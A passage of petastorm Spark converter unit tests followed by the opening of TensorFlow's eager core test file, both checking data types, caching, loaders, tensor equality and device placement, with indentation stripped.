if col == "bin_col":
actual_ele = bytearray(actual_ele)
if col == "float_col" or col == "double_col":
# Note that the default dtype is float32
assert pytest.approx(expected_ele, rel=1e-6) == actual_ele
else:
assert expected_ele == actual_ele
assert len(expected_df) == len(converter)
assert np.bool_ == ts.bool_col.dtype.type
assert np.float32 == ts.float_col.dtype.type
# Default dtype float32
assert np.float32 == ts.double_col.dtype.type
assert np.int16 == ts.short_col.dtype.type
assert np.int32 == ts.int_col.dtype.type
assert np.int64 == ts.long_col.dtype.type
assert np.object_ == ts.str_col.dtype.type
assert np.object_ == ts.bin_col.dtype.type
@create_tf_graph
def test_array_field(spark_test_ctx):
@pandas_udf('array<float>')
def gen_array(v):
return v.map(lambda x: np.random.rand(10))
df1 = spark_test_ctx.spark.range(10).withColumn('v', gen_array('id')).repartition(2)
cv1 = make_spark_converter(df1)
# we can auto infer one-dim array shape
with cv1.make_tf_dataset(batch_size=4, num_epochs=1) as dataset:
tf_iter = dataset.make_one_shot_iterator()
next_op = tf_iter.get_next()
with tf.Session() as sess:
batch1 = sess.run(next_op)
assert batch1.v.shape == (4, 10)
def test_delete(spark_test_ctx):
df = spark_test_ctx.spark.createDataFrame([(1, 2), (4, 5)], ["col1", "col2"])
# TODO add test for hdfs url
converter = make_spark_converter(df)
local_path = urlparse(converter.cache_dir_url).path
assert os.path.exists(local_path)
converter.delete()
assert not os.path.exists(local_path)
def test_atexit(spark_test_ctx):
lines = """
from petastorm.spark import SparkDatasetConverter, make_spark_converter
from pyspark.sql import SparkSession
import os
spark = SparkSession.builder.getOrCreate()
spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF, '{temp_url}')
df = spark.createDataFrame([(1, 2),(4, 5)], ["col1", "col2"])
converter = make_spark_converter(df)
f = open(os.path.join('{tempdir}', 'test_atexit.out'), "w")
f.write(converter.cache_dir_url)
f.close()
""".format(tempdir=spark_test_ctx.tempdir, temp_url=spark_test_ctx.temp_url)
code_str = "; ".join(
line.strip() for line in lines.strip().splitlines())
ret_code = subprocess.call([sys.executable, "-c", code_str])
assert 0 == ret_code
with open(os.path.join(spark_test_ctx.tempdir, 'test_atexit.out')) as f:
cache_dir_url = f.read()
fs = FilesystemResolver(cache_dir_url).filesystem()
assert not fs.exists(urlparse(cache_dir_url).path)
def test_set_delete_handler(spark_test_ctx):
def test_delete_handler(dir_url):
raise RuntimeError('Not implemented delete handler.')
register_delete_dir_handler(test_delete_handler)
with pytest.raises(RuntimeError, match='Not implemented delete handler'):
spark_dataset_converter._delete_dir_handler(spark_test_ctx.temp_url)
# Restore default delete handler (other test will use it)
register_delete_dir_handler(None)
def _get_compression_type(data_url):
files = os.listdir(urlparse(data_url).path)
pq_files = list(filter(lambda x: x.endswith('.parquet'), files))
filename_splits = pq_files[0].split('.')
if len(filename_splits) == 2:
return "uncompressed"
else:
return filename_splits[1]
def test_compression(spark_test_ctx):
df1 = spark_test_ctx.spark.range(10)
converter1 = make_spark_converter(df1)
assert "uncompressed" == \
_get_compression_type(converter1.cache_dir_url).lower()
converter2 = make_spark_converter(df1, compression_codec="snappy")
assert "snappy" == \
_get_compression_type(converter2.cache_dir_url).lower()
def test_df_caching(spark_test_ctx):
df1 = spark_test_ctx.spark.range(10)
df2 = spark_test_ctx.spark.range(10)
df3 = spark_test_ctx.spark.range(20)
# Test caching for the dataframes with the same logical plan
converter1 = make_spark_converter(df1)
converter2 = make_spark_converter(df2)
assert converter1.cache_dir_url == converter2.cache_dir_url
# Test no caching for different dataframes
converter3 = make_spark_converter(df3)
assert converter1.cache_dir_url != converter3.cache_dir_url
# Test no caching for the same dataframe with different row group size
converter11 = make_spark_converter(
df1, parquet_row_group_size_bytes=8 * 1024 * 1024)
converter21 = make_spark_converter(
df1, parquet_row_group_size_bytes=16 * 1024 * 1024)
assert converter11.cache_dir_url != converter21.cache_dir_url
# Test no caching for the same dataframe with different compression_codec
converter12 = make_spark_converter(df1, compression_codec=None)
converter22 = make_spark_converter(df1, compression_codec="snappy")
assert converter12.cache_dir_url != converter22.cache_dir_url
ori_temp_url = spark_test_ctx.spark.conf.get(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF)
tempdir = tempfile.mkdtemp('_spark_converter_test1')
new_temp_url = 'file://' + tempdir.replace(os.sep, '/')
try:
# Test no caching for the same dataframe with different parent cache dirs
spark_test_ctx.spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF,
new_temp_url)
assert ori_temp_url != new_temp_url
converter13 = make_spark_converter(df1)
assert converter1.cache_dir_url != converter13.cache_dir_url
# Test caching for the same dataframe with different parent cache dirs
# that could be normalized to the same parent cache dir
new_temp_url_2 = new_temp_url + os.sep
spark_test_ctx.spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF,
new_temp_url_2)
assert new_temp_url != new_temp_url_2
converter14 = make_spark_converter(df1)
assert converter13.cache_dir_url == converter14.cache_dir_url
finally:
spark_test_ctx.spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF,
ori_temp_url)
def test_df_delete_caching_meta(spark_test_ctx):
from petastorm.spark.spark_dataset_converter import _cache_df_meta_list
df1 = spark_test_ctx.spark.range(10)
df2 = spark_test_ctx.spark.range(20)
converter1 = make_spark_converter(df1)
converter2 = make_spark_converter(df2)
converter1.delete()
cached_list = set(map(lambda x: x.cache_dir_url, _cache_df_meta_list))
assert converter1.cache_dir_url not in cached_list
assert converter2.cache_dir_url in cached_list
# test recreate converter1 after delete should work.
make_spark_converter(df1)
def test_check_url():
with pytest.raises(ValueError, match='scheme-less'):
_check_url('/a/b/c')
def test_make_sub_dir_url():
assert _make_sub_dir_url('file:///a/b', 'c') == 'file:///a/b/c'
assert _make_sub_dir_url('hdfs:/a/b', 'c') == 'hdfs:/a/b/c'
assert _make_sub_dir_url('hdfs://nn1:9000/a/b', 'c') == 'hdfs://nn1:9000/a/b/c'
def test_pickling_remotely(spark_test_ctx):
df1 = spark_test_ctx.spark.range(100, 101)
converter1 = make_spark_converter(df1)
@create_tf_graph
def map_fn(_):
with converter1.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
return getattr(ts, 'id')[0]
result = spark_test_ctx.spark.sparkContext.parallelize(range(1), 1).map(map_fn).collect()[0]
assert result == 100
@create_tf_graph
def test_tf_dataset_batch_size(spark_test_ctx):
df1 = spark_test_ctx.spark.range(100)
batch_size = 30
converter1 = make_spark_converter(df1)
with converter1.make_tf_dataset(batch_size=batch_size) as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert len(ts.id) == batch_size
@mock.patch('petastorm.spark.spark_dataset_converter.make_batch_reader')
def test_tf_dataset_petastorm_args(mock_make_batch_reader, spark_test_ctx):
df1 = spark_test_ctx.spark.range(100).repartition(4)
conv1 = make_spark_converter(df1)
mock_make_batch_reader.return_value = make_batch_reader(conv1.cache_dir_url)
with conv1.make_tf_dataset(reader_pool_type='dummy', cur_shard=1, shard_count=4):
pass
peta_args = mock_make_batch_reader.call_args.kwargs
assert peta_args['reader_pool_type'] == 'dummy' and \
peta_args['cur_shard'] == 1 and \
peta_args['shard_count'] == 4 and \
peta_args['num_epochs'] is None and \
peta_args['workers_count'] == 4
with conv1.make_tf_dataset(num_epochs=1, workers_count=2):
pass
peta_args = mock_make_batch_reader.call_args.kwargs
assert peta_args['num_epochs'] == 1 and peta_args['workers_count'] == 2
def test_horovod_rank_compatibility(spark_test_ctx):
with mock.patch.dict(os.environ, {'HOROVOD_RANK': '1', 'HOROVOD_SIZE': '3'}, clear=True):
assert (1, 3) == _get_horovod_rank_and_size()
assert _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 1, "shard_count": 3})
assert not _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 1, "shard_count": 2})
assert not _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 0, "shard_count": 3})
with mock.patch.dict(os.environ, {'OMPI_COMM_WORLD_RANK': '1', 'OMPI_COMM_WORLD_SIZE': '3'}, clear=True):
assert (1, 3) == _get_horovod_rank_and_size()
with mock.patch.dict(os.environ, {'PMI_RANK': '1', 'PMI_SIZE': '3'}, clear=True):
assert (1, 3) == _get_horovod_rank_and_size()
with mock.patch.dict(os.environ, {}, clear=True):
assert (None, None) == _get_horovod_rank_and_size()
assert _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 1, "shard_count": 3})
@create_tf_graph
def test_dtype(spark_test_ctx):
df = spark_test_ctx.spark.range(10)
df = df.withColumn("float_col", df.id.cast(FloatType())) \
.withColumn("double_col", df.id.cast(DoubleType()))
converter1 = make_spark_converter(df)
with converter1.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.double_col.dtype.type
converter2 = make_spark_converter(df, dtype='float64')
with converter2.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float64 == ts.float_col.dtype.type
converter3 = make_spark_converter(df, dtype=None)
with converter3.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.float_col.dtype.type
assert np.float64 == ts.double_col.dtype.type
with pytest.raises(ValueError, match="dtype float16 is not supported. \
Use 'float32' or float64"):
make_spark_converter(df, dtype="float16")
@create_tf_graph
def test_array(spark_test_ctx):
df = spark_test_ctx.spark.createDataFrame(
[([1., 2., 3.],),
([4., 5., 6.],)],
StructType([
StructField(name='c1', dataType=ArrayType(DoubleType()))
])
)
converter1 = make_spark_converter(df)
with converter1.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.c1.dtype.type
@pytest.mark.skipif(
LooseVersion(pyspark.__version__) < LooseVersion("3.0"),
reason="Vector columns are not supported for pyspark {} < 3.0.0"
.format(pyspark.__version__))
@create_tf_graph
def test_vector_to_array(spark_test_ctx):
from pyspark.ml.linalg import Vectors
from pyspark.mllib.linalg import Vectors as OldVectors
df = spark_test_ctx.spark.createDataFrame([
(Vectors.dense(1.0, 2.0, 3.0), OldVectors.dense(10.0, 20.0, 30.0)),
(Vectors.dense(5.0, 6.0, 7.0), OldVectors.dense(50.0, 60.0, 70.0))
], ["vec", "oldVec"])
converter1 = make_spark_converter(df)
with converter1.make_tf_dataset(num_epochs=1) as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.vec.dtype.type
assert np.float32 == ts.oldVec.dtype.type
vec_col = ts.vec[ts.vec[:, 0].argsort()]
old_vec_col = ts.oldVec[ts.oldVec[:, 0].argsort()]
assert (2, 3) == ts.vec.shape
assert (2, 3) == ts.oldVec.shape
assert ([1., 2., 3.] == vec_col[0]).all() and \
([5., 6., 7.] == vec_col[1]).all()
assert ([10., 20., 30.] == old_vec_col[0]).all() and \
([50., 60., 70] == old_vec_col[1]).all()
def test_torch_primitive(spark_test_ctx):
import torch
schema = StructType([
StructField("bool_col", BooleanType(), False),
StructField("float_col", FloatType(), False),
StructField("double_col", DoubleType(), False),
StructField("short_col", ShortType(), False),
StructField("int_col", IntegerType(), False),
StructField("long_col", LongType(), False),
StructField("byte_col", ByteType(), False),
])
df = spark_test_ctx.spark.createDataFrame(
[(True, 0.12, 432.1, 5, 5, 0, -128),
(False, 123.45, 0.987, 9, 908, 765, 127)],
schema=schema).coalesce(1)
# If we use numPartition > 1, the order of the loaded dataset would
# be non-deterministic.
expected_df = df.collect()
converter = make_spark_converter(df)
batch = None
with converter.make_torch_dataloader(num_epochs=1) as dataloader:
for i, batch in enumerate(dataloader):
# default batch_size = 1
for col in df.schema.names:
actual_ele = batch[col][0]
expected_ele = expected_df[i][col]
if col == "float_col" or col == "double_col":
# Note that the default dtype is float32
assert pytest.approx(expected_ele, rel=1e-6) == actual_ele
else:
assert expected_ele == actual_ele
assert len(expected_df) == len(converter)
assert torch.uint8 == batch["bool_col"].dtype
assert torch.int8 == batch["byte_col"].dtype
assert torch.float32 == batch["double_col"].dtype
assert torch.float32 == batch["float_col"].dtype
assert torch.int32 == batch["int_col"].dtype
assert torch.int64 == batch["long_col"].dtype
assert torch.int16 == batch["short_col"].dtype
def test_torch_pickling_remotely(spark_test_ctx):
df1 = spark_test_ctx.spark.range(100, 101)
converter1 = make_spark_converter(df1)
def map_fn(_):
with converter1.make_torch_dataloader(num_epochs=1) as dataloader:
for batch in dataloader:
ret = batch["id"][0]
return ret
result = spark_test_ctx.spark.sparkContext.parallelize(range(1), 1) \
.map(map_fn).collect()[0]
assert result == 100
def test_torch_batch_size(spark_test_ctx):
df = spark_test_ctx.spark.range(8)
conv = make_spark_converter(df)
batch_size = 2
with conv.make_torch_dataloader(batch_size=batch_size,
num_epochs=1) as dataloader:
for batch in dataloader:
assert batch_size == batch['id'].shape[0]
def test_torch_transform_spec(spark_test_ctx):
df = spark_test_ctx.spark.range(8)
conv = make_spark_converter(df)
from torchvision import transforms
from petastorm import TransformSpec
def _transform_row(df_row):
scale_tranform = transforms.Compose([
transforms.Lambda(lambda x: x * 0.1),
])
return scale_tranform(df_row)
transform = TransformSpec(_transform_row)
with conv.make_torch_dataloader(transform_spec=transform,
num_epochs=1) as dataloader:
for batch in dataloader:
assert min(batch['id']) >= 0 and max(batch['id']) < 1
def test_torch_unexpected_param(spark_test_ctx):
df = spark_test_ctx.spark.range(8)
conv = make_spark_converter(df)
with pytest.raises(TypeError, match="unexpected keyword argument 'xyz'"):
with conv.make_torch_dataloader(xyz=1) as _:
pass
@mock.patch('petastorm.spark.spark_dataset_converter.make_batch_reader')
def test_torch_dataloader_advanced_params(mock_torch_make_batch_reader, spark_test_ctx):
SHARD_COUNT = 3
df = spark_test_ctx.spark.range(100).repartition(SHARD_COUNT)
conv = make_spark_converter(df)
mock_torch_make_batch_reader.return_value = \
make_batch_reader(conv.cache_dir_url)
with conv.make_torch_dataloader(reader_pool_type='dummy', cur_shard=1,
shard_count=SHARD_COUNT) as _:
pass
peta_args = mock_torch_make_batch_reader.call_args.kwargs
assert peta_args['reader_pool_type'] == 'dummy' and \
peta_args['cur_shard'] == 1 and \
peta_args['shard_count'] == SHARD_COUNT and \
peta_args['num_epochs'] is None and \
peta_args['workers_count'] == 4
# Test default value overridden arguments.
with conv.make_torch_dataloader(num_epochs=1, workers_count=2) as _:
pass
peta_args = mock_torch_make_batch_reader.call_args.kwargs
assert peta_args['num_epochs'] == 1 and peta_args['workers_count'] == 2
def test_wait_file_available(spark_test_ctx):
pq_dir = os.path.join(spark_test_ctx.tempdir, 'test_ev')
os.makedirs(pq_dir)
file1_path = os.path.join(pq_dir, 'file1')
file2_path = os.path.join(pq_dir, 'file2')
url1 = 'file://' + file1_path.replace(os.sep, '/')
url2 = 'file://' + file2_path.replace(os.sep, '/')
url_list = [url1, url2]
def create_file(p):
with open(p, 'w'):
pass
# 1. test all files exists.
create_file(file1_path)
create_file(file2_path)
_wait_file_available(url_list)
# 2. test one file does not exists. Raise error.
os.remove(file2_path)
with pytest.raises(RuntimeError,
match='Timeout while waiting for all parquet-store files to appear at urls'):
_wait_file_available(url_list)
# 3. test one file accessible after 1 second.
def delay_create_file2():
time.sleep(1)
create_file(file2_path)
threading.Thread(target=delay_create_file2()).start()
_wait_file_available(url_list)
def test_check_dataset_file_median_size(spark_test_ctx, caplog):
file_size_map = {
'/a/b/01.parquet': 30,
'/a/b/02.parquet': 40,
'/a/b/03.parquet': 50,
'/a/b/04.parquet': 60,
'/a/b/05.parquet': 999000,
}
with mock.patch('os.path.getsize') as mock_path_get_size:
mock_path_get_size.side_effect = lambda p: file_size_map[p]
url_list = ['file://' + path for path in file_size_map.keys()]
caplog.clear()
_check_dataset_file_median_size(url_list)
assert 'The median size' in " ".join(caplog.messages)
for k in file_size_map:
file_size_map[k] *= (1024 * 1024)
caplog.clear()
_check_dataset_file_median_size(url_list)
assert 'The median size' not in " ".join(caplog.messages)
file_size_map = {'/a/b/01.parquet': 29}
url_list = ['file:///a/b/01.parquet']
caplog.clear()
_check_dataset_file_median_size(url_list)
assert 'The median size' not in " ".join(caplog.messages)
@mock.patch.dict(os.environ, {'DATABRICKS_RUNTIME_VERSION': '7.0'}, clear=True)
def test_check_parent_cache_dir_url(spark_test_ctx, caplog):
def log_warning_occur():
return 'you should specify a dbfs fuse path' in '\n'.join([r.message for r in caplog.records])
with mock.patch('petastorm.spark.spark_dataset_converter._is_spark_local_mode') as mock_is_local:
mock_is_local.return_value = False
caplog.clear()
_check_parent_cache_dir_url('file:/dbfs/a/b')
assert not log_warning_occur()
caplog.clear()
_check_parent_cache_dir_url('file:/a/b')
assert log_warning_occur()
mock_is_local.return_value = True
caplog.clear()
_check_parent_cache_dir_url('file:/dbfs/a/b')
assert not log_warning_occur()
caplog.clear()
_check_parent_cache_dir_url('file:/a/b')
assert not log_warning_occur()
def test_get_spark_session_safe_check(spark_test_ctx):
def map_fn(_):
_get_spark_session()
return 0
with pytest.raises(py4j.protocol.Py4JJavaError):
spark_test_ctx.spark.sparkContext.parallelize(range(1), 1).map(map_fn).collect()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
if compat.forward_compatible(2019, 9, 25):
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
else:
with self.assertRaises(errors.InvalidArgumentError):
bool(tf_a != tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
